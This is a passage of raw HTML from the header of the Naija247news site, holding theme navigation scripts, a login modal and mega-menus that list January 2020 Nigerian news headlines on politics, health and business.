            <a target="_blank" href="http://feeds.feedburner.com/naija247news/ASsy" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://godwin12345.tumblr.com/" title="Tumblr">
                <i class="td-icon-font td-icon-tumblr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/naija247new" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></div>
    </div>

<!-- LOGIN MODAL -->

                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                    <div class="td-login-wrap">
                        <a href="#" class="td-back-button"><i class="td-icon-modal-back"></i></a>
                        <div id="td-login-div" class="td-login-form-div td-display-block">
                            <div class="td-login-panel-title">Sign in</div>
                            <div class="td-login-panel-descr">Welcome! Log into your account</div>
                            <div class="td_display_err"></div>
                            <div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email" value="" required><label>your username</label></div>
	                        <div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" required><label>your password</label></div>
                            <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Login">
                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password? Get help</a></div>
                            <a id="register-link">Create an account</a>
                        </div>

                        
                <div id="td-register-div" class="td-login-form-div td-display-none">
                    <div class="td-login-panel-title">Create an account</div>
                    <div class="td-login-panel-descr">Welcome! Register for an account</div>
                    <div class="td_display_err"></div>
                    <div class="td-login-inputs"><input class="td-login-input" type="text" name="register_email" id="register_email" value="" required><label>your email</label></div>
                    <div class="td-login-inputs"><input class="td-login-input" type="text" name="register_user" id="register_user" value="" required><label>your username</label></div>
                    <input type="button" name="register_button" id="register_button" class="wpb_button btn td-login-button" value="Register">
                    <div class="td-login-info-text">A password will be e-mailed to you.</div>
                </div>

                         <div id="td-forgot-pass-div" class="td-login-form-div td-display-none">
                            <div class="td-login-panel-title">Password recovery</div>
                            <div class="td-login-panel-descr">Recover your password</div>
                            <div class="td_display_err"></div>
                            <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email" value="" required><label>your email</label></div>
                            <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Password">
                            <div class="td-login-info-text">A password will be e-mailed to you.</div>
                        </div>
                    </div>
                </div>
                        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                        <a class="td-main-logo" href="https://naija247news.com/">
            <img class="td-retina-data" data-retina="http://naija247news.com/wp-content/uploads/2018/12/Naija247newslogo2.jpg" src="http://naija247news.com/wp-content/uploads/2018/12/Naija247newslogo.jpg" alt=" Tracking Investigative Reports on Nigerian Economy ..."/>
            <span class="td-visual-hidden">Naija247news</span>
        </a>
                </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-header ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;
</script>
</div>

 <!-- end A --> 


</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
        		<a class="td-mobile-logo td-sticky-header" href="https://naija247news.com/">
			<img class="td-retina-data" data-retina="http://naija247news.com/wp-content/uploads/2018/12/mo.jpg" src="http://naija247news.com/wp-content/uploads/2018/12/mobileLogoNaija247news.jpg" alt=" Tracking Investigative Reports on Nigerian Economy ..."/>
		</a>
			<a class="td-header-logo td-sticky-header" href="https://naija247news.com/">
			<img class="td-retina-data" data-retina="http://naija247news.com/wp-content/uploads/2018/12/Naija247newslogo2.jpg" src="http://naija247news.com/wp-content/uploads/2018/12/Naija247newslogo.jpg" alt=" Tracking Investigative Reports on Nigerian Economy ..."/>
		</a>
	    </div>
    <div class="menu-main-container"><ul id="menu-main-1" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-212408"><a href="http://naija247news.com/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-11"><a href="https://naija247news.com/category/national/">National</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_2_5e2cc0f8ddcaa_rand td-no-subcats td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_2_5e2cc0f8ddcaa" ><script>var block_td_uid_2_5e2cc0f8ddcaa = new tdBlock();
block_td_uid_2_5e2cc0f8ddcaa.id = "td_uid_2_5e2cc0f8ddcaa";
block_td_uid_2_5e2cc0f8ddcaa.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"203","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_2_5e2cc0f8ddcaa_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_2_5e2cc0f8ddcaa_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_2_5e2cc0f8ddcaa.td_column_number = "3";
block_td_uid_2_5e2cc0f8ddcaa.block_type = "td_block_mega_menu";
block_td_uid_2_5e2cc0f8ddcaa.post_count = "5";
block_td_uid_2_5e2cc0f8ddcaa.found_posts = "2726";
block_td_uid_2_5e2cc0f8ddcaa.header_color = "";
block_td_uid_2_5e2cc0f8ddcaa.ajax_pagination_infinite_stop = "";
block_td_uid_2_5e2cc0f8ddcaa.max_num_pages = "546";
tdBlocksArray.push(block_td_uid_2_5e2cc0f8ddcaa);
</script><div id=td_uid_2_5e2cc0f8ddcaa class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/25/i-was-misinterpreted-on-operation-amotekun-i-did-not-say-its-illegal-malami/" rel="bookmark" title="“I was misinterpreted on Operation Amotekun. I did not say it’s illegal &#8211; Malami"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/Attorney-General-of-the-Federation-Abubakar-Malami.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/Attorney-General-of-the-Federation-Abubakar-Malami.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/Attorney-General-of-the-Federation-Abubakar-Malami.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="“I was misinterpreted on Operation Amotekun. I did not say it’s illegal &#8211; Malami"/></a></div>                <a href="https://naija247news.com/category/top-news/" class="td-post-category">Top News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/25/i-was-misinterpreted-on-operation-amotekun-i-did-not-say-its-illegal-malami/" rel="bookmark" title="“I was misinterpreted on Operation Amotekun. I did not say it’s illegal &#8211; Malami">“I was misinterpreted on Operation Amotekun. I did not say it’s&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/malnutrition-accounts-for-53-of-childrens-death-in-nigeria/" rel="bookmark" title="Malnutrition accounts for 53% of children&#8217;s death in Nigeria"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/06/Sanusi-II.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/06/Sanusi-II.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2019/06/Sanusi-II.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Malnutrition accounts for 53% of children&#8217;s death in Nigeria"/></a></div>                <a href="https://naija247news.com/category/top-news/" class="td-post-category">Top News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/malnutrition-accounts-for-53-of-childrens-death-in-nigeria/" rel="bookmark" title="Malnutrition accounts for 53% of children&#8217;s death in Nigeria">Malnutrition accounts for 53% of children&#8217;s death in Nigeria</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/usaid-holds-agribusiness-forum/" rel="bookmark" title="USAID holds agribusiness forum"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/usaid.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/usaid.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/usaid.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="USAID holds agribusiness forum"/></a></div>                <a href="https://naija247news.com/category/top-news/" class="td-post-category">Top News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/usaid-holds-agribusiness-forum/" rel="bookmark" title="USAID holds agribusiness forum">USAID holds agribusiness forum</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/establish-agro-allied-industry-to-achieve-food-security-buhari-advise-state-governors/" rel="bookmark" title="Establish Agro-Allied industry to achieve food security, Buhari advise state governors"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/12/Muhammadu-buhari-696x385-1.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/12/Muhammadu-buhari-696x385-1.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2019/12/Muhammadu-buhari-696x385-1.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Establish Agro-Allied industry to achieve food security, Buhari advise state governors"/></a></div>                <a href="https://naija247news.com/category/top-news/" class="td-post-category">Top News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/establish-agro-allied-industry-to-achieve-food-security-buhari-advise-state-governors/" rel="bookmark" title="Establish Agro-Allied industry to achieve food security, Buhari advise state governors">Establish Agro-Allied industry to achieve food security, Buhari advise state governors</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/lagos-govt-begins-recruitment-in-health-sector/" rel="bookmark" title="Lagos govt begins recruitment in health sector"><img width="218" height="150" class="entry-thumb" src="https://i2.wp.com/naija247news.com/wp-content/uploads/2019/03/Babajide-Sanwo-Olu-of-APC-endorsed-by-Ohaneze-e1551653713607-1.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i2.wp.com/naija247news.com/wp-content/uploads/2019/03/Babajide-Sanwo-Olu-of-APC-endorsed-by-Ohaneze-e1551653713607-1.jpg?resize=218%2C150&#038;ssl=1 218w, https://i2.wp.com/naija247news.com/wp-content/uploads/2019/03/Babajide-Sanwo-Olu-of-APC-endorsed-by-Ohaneze-e1551653713607-1.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Lagos govt begins recruitment in health sector"/></a></div>                <a href="https://naija247news.com/category/top-news/" class="td-post-category">Top News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/lagos-govt-begins-recruitment-in-health-sector/" rel="bookmark" title="Lagos govt begins recruitment in health sector">Lagos govt begins recruitment in health sector</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_2_5e2cc0f8ddcaa" data-td_block_id="td_uid_2_5e2cc0f8ddcaa"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_2_5e2cc0f8ddcaa" data-td_block_id="td_uid_2_5e2cc0f8ddcaa"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-7"><a href="https://naija247news.com/category/business/">Business</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_3_5e2cc0f8e63fc_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_3_5e2cc0f8e63fc" ><script>var block_td_uid_3_5e2cc0f8e63fc = new tdBlock();
block_td_uid_3_5e2cc0f8e63fc.id = "td_uid_3_5e2cc0f8e63fc";
block_td_uid_3_5e2cc0f8e63fc.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"8","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_3_5e2cc0f8e63fc_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_3_5e2cc0f8e63fc_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_3_5e2cc0f8e63fc.td_column_number = "3";
block_td_uid_3_5e2cc0f8e63fc.block_type = "td_block_mega_menu";
block_td_uid_3_5e2cc0f8e63fc.post_count = "4";
block_td_uid_3_5e2cc0f8e63fc.found_posts = "1213";
block_td_uid_3_5e2cc0f8e63fc.header_color = "";
block_td_uid_3_5e2cc0f8e63fc.ajax_pagination_infinite_stop = "";
block_td_uid_3_5e2cc0f8e63fc.max_num_pages = "304";
tdBlocksArray.push(block_td_uid_3_5e2cc0f8e63fc);
</script><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_3_5e2cc0f8e63fc" id="td_uid_4_5e2cc0f8e8695" data-td_block_id="td_uid_3_5e2cc0f8e63fc" data-td_filter_value="" href="https://naija247news.com/category/business/">All</a><a class="mega-menu-sub-cat-td_uid_3_5e2cc0f8e63fc"  id="td_uid_5_5e2cc0f8e86dc" data-td_block_id="td_uid_3_5e2cc0f8e63fc" data-td_filter_value="216" href="https://naija247news.com/category/business/branding-news/">Branding News</a><a class="mega-menu-sub-cat-td_uid_3_5e2cc0f8e63fc"  id="td_uid_6_5e2cc0f8e871b" data-td_block_id="td_uid_3_5e2cc0f8e63fc" data-td_filter_value="30" href="https://naija247news.com/category/business/entrepreneurs/">Entrepreneurs</a><a class="mega-menu-sub-cat-td_uid_3_5e2cc0f8e63fc"  id="td_uid_7_5e2cc0f8e8751" data-td_block_id="td_uid_3_5e2cc0f8e63fc" data-td_filter_value="223" href="https://naija247news.com/category/business/news-business/">News</a><a class="mega-menu-sub-cat-td_uid_3_5e2cc0f8e63fc"  id="td_uid_8_5e2cc0f8e877a" data-td_block_id="td_uid_3_5e2cc0f8e63fc" data-td_filter_value="414" href="https://naija247news.com/category/business/report/">Report</a><a class="mega-menu-sub-cat-td_uid_3_5e2cc0f8e63fc"  id="td_uid_9_5e2cc0f8e87a2" data-td_block_id="td_uid_3_5e2cc0f8e63fc" data-td_filter_value="224" href="https://naija247news.com/category/business/start-ups/">Start-ups</a></div></div><div id=td_uid_3_5e2cc0f8e63fc class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/succession-management-crucial-for-business-continuity-in-nigerias-microfinance-banking-industry/" rel="bookmark" title="&#8216;Succession management, crucial for Business continuity in Nigeria&#8217;s microfinance banking industry&#8217;"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/FINCA-Microfinance-Bank-Limited.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/FINCA-Microfinance-Bank-Limited.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/FINCA-Microfinance-Bank-Limited.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="&#8216;Succession management, crucial for Business continuity in Nigeria&#8217;s microfinance banking industry&#8217;"/></a></div>                <a href="https://naija247news.com/category/business/news-business/" class="td-post-category">News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/succession-management-crucial-for-business-continuity-in-nigerias-microfinance-banking-industry/" rel="bookmark" title="&#8216;Succession management, crucial for Business continuity in Nigeria&#8217;s microfinance banking industry&#8217;">&#8216;Succession management, crucial for Business continuity in Nigeria&#8217;s microfinance banking industry&#8217;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/23/lekoil-improving-lives-and-adapting-to-the-changing-priorities-of-the-energy-market/" rel="bookmark" title="LekOil: Improving lives and adapting to the changing priorities of the Energy Market"><img width="218" height="150" class="entry-thumb" src="https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/Olalekan-Akinyanmi.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/Olalekan-Akinyanmi.jpg?resize=218%2C150&#038;ssl=1 218w, https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/Olalekan-Akinyanmi.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="LekOil: Improving lives and adapting to the changing priorities of the Energy Market"/></a></div>                <a href="https://naija247news.com/category/business/entrepreneurs/" class="td-post-category">Entrepreneurs</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/23/lekoil-improving-lives-and-adapting-to-the-changing-priorities-of-the-energy-market/" rel="bookmark" title="LekOil: Improving lives and adapting to the changing priorities of the Energy Market">LekOil: Improving lives and adapting to the changing priorities of the&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/22/focus-on-access-to-power-sahara-group-urges-investors-in-uk-africa/" rel="bookmark" title="Focus on potentials of Nigeria&#8217;s power access, Sahara Group urges investors in UK, Africa"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/power-plant.jpeg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/power-plant.jpeg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/power-plant.jpeg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Focus on potentials of Nigeria&#8217;s power access, Sahara Group urges investors in UK, Africa"/></a></div>                <a href="https://naija247news.com/category/business/news-business/" class="td-post-category">News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/22/focus-on-access-to-power-sahara-group-urges-investors-in-uk-africa/" rel="bookmark" title="Focus on potentials of Nigeria&#8217;s power access, Sahara Group urges investors in UK, Africa">Focus on potentials of Nigeria&#8217;s power access, Sahara Group urges investors&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/21/fidelity-bank-splashes-n50m-cash-prizes-on-customers/" rel="bookmark" title="Fidelity Bank splashes N50m cash prizes on customers"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/image0091.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/image0091.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/image0091.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Fidelity Bank splashes N50m cash prizes on customers"/></a></div>                <a href="https://naija247news.com/category/business/branding-news/" class="td-post-category">Branding News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/21/fidelity-bank-splashes-n50m-cash-prizes-on-customers/" rel="bookmark" title="Fidelity Bank splashes N50m cash prizes on customers">Fidelity Bank splashes N50m cash prizes on customers</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_5e2cc0f8e63fc" data-td_block_id="td_uid_3_5e2cc0f8e63fc"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_3_5e2cc0f8e63fc" data-td_block_id="td_uid_3_5e2cc0f8e63fc"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-290048"><a href="https://naija247news.com/category/companies/">Companies</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-8"><a href="https://naija247news.com/category/economy/">Economy</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_10_5e2cc0f8eb246_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_10_5e2cc0f8eb246" ><script>var block_td_uid_10_5e2cc0f8eb246 = new tdBlock();
block_td_uid_10_5e2cc0f8eb246.id = "td_uid_10_5e2cc0f8eb246";
block_td_uid_10_5e2cc0f8eb246.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"17","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_10_5e2cc0f8eb246_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_10_5e2cc0f8eb246_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_10_5e2cc0f8eb246.td_column_number = "3";
block_td_uid_10_5e2cc0f8eb246.block_type = "td_block_mega_menu";
block_td_uid_10_5e2cc0f8eb246.post_count = "4";
block_td_uid_10_5e2cc0f8eb246.found_posts = "2390";
block_td_uid_10_5e2cc0f8eb246.header_color = "";
block_td_uid_10_5e2cc0f8eb246.ajax_pagination_infinite_stop = "";
block_td_uid_10_5e2cc0f8eb246.max_num_pages = "598";
tdBlocksArray.push(block_td_uid_10_5e2cc0f8eb246);
</script><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246" id="td_uid_11_5e2cc0f8eedc6" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="" href="https://naija247news.com/category/economy/">All</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_12_5e2cc0f8eee17" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="230" href="https://naija247news.com/category/economy/agriculture/">Agriculture</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_13_5e2cc0f8eee56" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="20" href="https://naija247news.com/category/economy/analysis/">Analysis</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_14_5e2cc0f8eee94" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="714" href="https://naija247news.com/category/economy/banking-institutions/">Banking Institutions</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_15_5e2cc0f8eeede" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="21" href="https://naija247news.com/category/economy/economic-indicators/">Economic Indicators</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_16_5e2cc0f8eef10" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="229" href="https://naija247news.com/category/economy/eurobond/">EuroBond</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_17_5e2cc0f8eef3b" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="19" href="https://naija247news.com/category/economy/infrastructure/">Infrastructure</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_18_5e2cc0f8eef6d" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="447" href="https://naija247news.com/category/economy/infrastructure/investing-infrastructure/">Investing</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_19_5e2cc0f8eefb2" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="548" href="https://naija247news.com/category/economy/infrastructure/pension-retirement/">Pension &amp; Retirement</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_20_5e2cc0f8eefe8" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="443" href="https://naija247news.com/category/economy/infrastructure/power-infrastructure/">Power</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_21_5e2cc0f8ef01b" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="416" href="https://naija247news.com/category/economy/infrastructure/real-estate/">Real Estate</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_22_5e2cc0f8ef058" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="437" href="https://naija247news.com/category/economy/infrastructure/road/">Road</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_23_5e2cc0f8ef091" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="621" href="https://naija247news.com/category/economy/insurance-economy/">Insurance</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_24_5e2cc0f8ef0ba" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="22" href="https://naija247news.com/category/economy/manufacturing/">Manufacturing</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_25_5e2cc0f8ef0e1" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="231" href="https://naija247news.com/category/economy/maritime/">Maritime</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_26_5e2cc0f8ef107" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="631" href="https://naija247news.com/category/economy/mining/">Mining</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_27_5e2cc0f8ef137" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="233" href="https://naija247news.com/category/economy/revenue/">Revenue</a><a class="mega-menu-sub-cat-td_uid_10_5e2cc0f8eb246"  id="td_uid_28_5e2cc0f8ef15e" data-td_block_id="td_uid_10_5e2cc0f8eb246" data-td_filter_value="620" href="https://naija247news.com/category/economy/tourism/">Tourism</a></div></div><div 